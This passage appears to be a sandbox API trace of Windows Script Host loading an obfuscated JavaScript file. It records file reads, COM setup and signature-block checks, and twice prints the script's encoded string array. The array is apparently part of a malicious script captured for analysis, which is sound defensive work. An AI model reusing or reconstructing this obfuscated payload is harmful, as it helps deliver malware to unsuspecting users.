cOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0077.919] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1
	[0077.919] CloseHandle (hObject=0x114) returned 1
	[0077.919] CloseHandle (hObject=0x110) returned 1
	[0077.920] GetSystemDirectoryA (in: lpBuffer=0x19f128, uSize=0x0 | out: lpBuffer="lõ\x19") returned 0x14
	[0077.920] ??2@YAPEAX_K@Z () returned 0x4f74d0
	[0077.920] GetSystemDirectoryA (in: lpBuffer=0x4f74d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0077.920] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0077.920] ??3@YAXPEAX@Z () returned 0x45311b01
	[0077.920] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0077.920] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0077.920] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0077.920] IdentifyCodeAuthzLevelW () returned 0x1
	[0078.458] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19e2a0 | out: lpSystemTimeAsFileTime=0x19e2a0*(dwLowDateTime=0xa7298e50, dwHighDateTime=0x1d543d1)) 
	[0078.458] GetCurrentProcessId () returned 0x8c0
	[0078.458] GetCurrentThreadId () returned 0x8c4
	[0078.458] GetTickCount () returned 0x244ad
	[0078.458] QueryPerformanceCounter (in: lpPerformanceCount=0x19e2a8 | out: lpPerformanceCount=0x19e2a8*=20288422870) returned 1
	[0078.458] malloc (_Size=0x100) returned 0x4f7b60
	[0078.459] GetVersionExA (in: lpVersionInformation=0x19e080*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x19e080*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0078.459] GetUserDefaultLCID () returned 0x409
	[0078.460] IsFileSupportedName () returned 0x1
	[0078.460] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0078.460] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0078.460] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0078.463] GetSignedDataMsg () returned 0x0
	[0078.463] GetCurrentProcess () returned 0xffffffffffffffff
	[0078.463] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x19e8e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19e8e0*=0x140) returned 1
	[0078.463] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0078.463] ??2@YAPEAX_K@Z () returned 0x4fa4f0
	[0078.464] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0078.464] ReadFile (in: hFile=0x140, lpBuffer=0x4fa4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x19e8c0, lpOverlapped=0x0 | out: lpBuffer=0x4fa4f0*, lpNumberOfBytesRead=0x19e8c0*=0x4b68, lpOverlapped=0x0) returned 1
	[0078.464] CoInitialize (pvReserved=0x0) returned 0x1
	[0078.464] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x19e830 | out: ppv=0x19e830*=0x4ff4c0) returned 0x0
	[0078.468] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ca30 | out: lpSystemTimeAsFileTime=0x19ca30*(dwLowDateTime=0xa72befb0, dwHighDateTime=0x1d543d1)) 
	[0078.468] GetCurrentProcessId () returned 0x8c0
	[0078.468] GetCurrentThreadId () returned 0x8c4
	[0078.468] GetTickCount () returned 0x244bc
	[0078.468] QueryPerformanceCounter (in: lpPerformanceCount=0x19ca38 | out: lpPerformanceCount=0x19ca38*=20289424671) returned 1
	[0078.468] malloc (_Size=0x100) returned 0x4f7c70
	[0078.468] __dllonexit () returned 0x7fef24914c0
	[0078.469] __dllonexit () returned 0x7fef24914e8
	[0078.469] GetVersionExA (in: lpVersionInformation=0x19c810*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf2492dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf24914e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x19c810*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0078.469] GetProcessWindowStation () returned 0x30
	[0078.469] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x19c7f8, nLength=0xc, lpnLengthNeeded=0x19c7f0 | out: pvInfo=0x19c7f8, lpnLengthNeeded=0x19c7f0) returned 1
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff060
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff0b0
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff0e0
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff120
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff160
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff1a0
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff1e0
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff220
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff260
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff2a0
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff2e0
	[0078.469] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff330
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff370
	[0078.469] DllGetClassObject (in: rclsid=0x1fe400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19d500 | out: ppv=0x19d500*=0x4ff0b0) returned 0x0
	[0078.469] ??2@YAPEAX_K@Z () returned 0x4ff0b0
	[0078.469] IClassFactory:CreateInstance (in: This=0x4ff0b0, pUnkOuter=0x0, riid=0x19e2e0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x19d520 | out: ppvObject=0x19d520*=0x4ff4c0) returned 0x0
	[0078.470] ??2@YAPEAX_K@Z () returned 0x4ff3b0
	[0078.470] GetSystemInfo (in: lpSystemInfo=0x19d360 | out: lpSystemInfo=0x19d360*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0078.470] VirtualQuery (in: lpAddress=0x19d3d0, lpBuffer=0x19d390, dwLength=0x30 | out: lpBuffer=0x19d390*(BaseAddress=0x19d000, AllocationBase=0xa0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0078.470] ??2@YAPEAX_K@Z () returned 0x4ff3f0
	[0078.470] ??2@YAPEAX_K@Z () returned 0x4ff410
	[0078.470] ??2@YAPEAX_K@Z () returned 0x4ff470
	[0078.470] ??2@YAPEAX_K@Z () returned 0x4ff4a0
	[0078.470] ??2@YAPEAX_K@Z () returned 0x4ff550
	[0078.470] IUnknown:AddRef (This=0x4ff4c0) returned 0x2
	[0078.470] IUnknown:Release (This=0x4ff4c0) returned 0x1
	[0078.470] IUnknown:Release (This=0x4ff0b0) returned 0x0
	[0078.470] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.470] IUnknown:QueryInterface (in: This=0x4ff4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x19e768 | out: ppvObject=0x19e768*=0x4ff4c0) returned 0x0
	[0078.470] IUnknown:Release (This=0x4ff4c0) returned 0x1
	[0078.470] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0078.470] IsTextUnicode (in: lpv=0x4fa4f0, iSize=19304, lpiResult=0x19e7b8 | out: lpiResult=0x19e7b8) returned 0
	[0078.470] GetACP () returned 0x4e4
	[0078.470] malloc (_Size=0x97d0) returned 0x33dfd0
	[0078.471] GetACP () returned 0x4e4
	[0078.471] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4fa4f0, cbMultiByte=19304, lpWideCharStr=0x33dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0078.471] realloc (_Block=0x33dfd0, _Size=0x96d0) returned 0x33dfd0
	[0078.471] ??2@YAPEAX_K@Z () returned 0x4ff0b0
	[0078.472] free (_Block=0x33dfd0) 
	[0078.472] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.472] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.472] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.472] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.472] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.472] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.472] CoUninitialize () 
	[0078.472] ??3@YAXPEAX@Z () returned 0x45311b01
	[0078.472] CloseHandle (hObject=0x140) returned 1
	[0078.473] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0078.473] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0078.473] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.473] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0078.473] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0078.473] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0078.473] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0078.473] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0078.473] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.473] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.473] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0078.473] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0078.473] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.473] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0078.473] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.473] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0078.473] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0078.473] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.473] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0078.473] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0078.473] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0078.473] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0078.473] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0078.473] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.473] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.473] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0078.473] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0078.473] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0078.473] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.473] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0078.473] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
